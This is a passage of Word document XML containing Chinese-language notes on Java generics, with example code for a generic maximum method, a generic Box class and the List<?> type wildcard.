        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main( String args[] )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CAE59" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9432E" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.printf( "%d, %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中最大的数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d\n\n",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E93140D" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                   3, 4, 5, maximum( 3, 4, 5 ) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B75167C" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC4BC4" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.printf( "%.1f, %.1f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %.1f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中最大的数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %.1f\n\n",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15238B4D" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                   6.6, 8.8, 7.7, maximum( 6.6, 8.8, 7.7 ) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA3CE6F" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A333A6A" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.printf( "%s, %s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中最大的数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %s\n","pear",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54AFED" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         "apple", "orange", maximum( "pear", "apple", "orange" ) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDF282" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C3DE24" w14:textId="0C7D5626" w:rsidR="00813C16" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147448DF" w14:textId="77777777" w:rsidR="00813C16" w:rsidRDefault="00813C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2F3BB6" w14:textId="22A41AB9" w:rsidR="00DC6A45" w:rsidRDefault="00DC6A45" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DEBA8" w14:textId="2B52375A" w:rsidR="00CE036E" w:rsidRDefault="00CE036E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFB278A" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2BE0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>public class Box&lt;T&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28CBEB" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A240111" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  private T t;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249A50C" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D75DA" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public void add(T t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF2ABF" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    this.t = t;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707D9A5" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33357D50" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26152EE5" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public T get() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B4CFF3" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return t;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549A5F10" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413DD516" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C247286" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A6E1A" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Box&lt;Integer&gt; integerBox = new Box&lt;Integer&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E92D1" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Box&lt;String&gt; stringBox = new Box&lt;String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C033EAE" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5388827C" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    integerBox.add(new Integer(10));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3702B0D4" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    stringBox.add(new String("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>菜鸟教程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46906D" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F9684" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整型值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> :%d\n\n", integerBox.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE159A" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> :%s\n", stringBox.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF9202" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33022336" w14:textId="14C12122" w:rsidR="007D6C90" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738E4E4" w14:textId="6CB1DB10" w:rsidR="007D6C90" w:rsidRDefault="007D6C90" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB38716" w14:textId="77777777" w:rsidR="007D6C90" w:rsidRDefault="007D6C90" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="885"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8C32DB" w14:textId="45CD49F4" w:rsidR="00DC6A45" w:rsidRDefault="00DC6A45" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r w:rsidR="00421297">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型通配符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7FF46" w14:textId="0C87CB96" w:rsidR="00CE036E" w:rsidRDefault="00CE036E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5099ECAB" w14:textId="5226BC88" w:rsidR="00DC6A45" w:rsidRDefault="001E2533" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型通配符一般是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ? </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代替具体的类型参数。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>List&lt;?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在逻辑上是</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>List&lt;String&gt;,List&lt;Integer&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等所有</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> List&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体类型实参</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的父类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2777611F" w14:textId="77777777" w:rsidR="00421297" w:rsidRDefault="00421297" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8263D8" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D1310" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78110C20" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class GenericTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B141F" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FC3B3" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D38D15" w14:textId="77777777" w:rsidR="00F25810" w:rsidRPr="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>List&lt;String&gt; name = new ArrayList&lt;String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D83D6A" w14:textId="77777777" w:rsidR="00F25810" w:rsidRPr="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        List&lt;Integer&gt; age = new ArrayList&lt;Integer&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB8DCBB" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        List&lt;Number&gt; number = new ArrayList&lt;Number&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF8C7E0" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4518C354" w14:textId="77777777" w:rsidR="00F25810" w:rsidRPr="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>name.add("icon");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A3705" w14:textId="77777777" w:rsidR="00F25810" w:rsidRPr="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        age.add(18);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CED9BED" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        number.add(314);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283962A" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D246C2E" w14:textId="77777777" w:rsidR="00F25810" w:rsidRPr="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>getData(name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4956C68D" w14:textId="77777777" w:rsidR="00F25810" w:rsidRPr="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        getData(age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210BF5A4" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        getData(number);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB6ABE" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169AF6E2" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA0819F" w14:textId="5459F523" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> getData() </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法的参数是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> List&lt;?&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
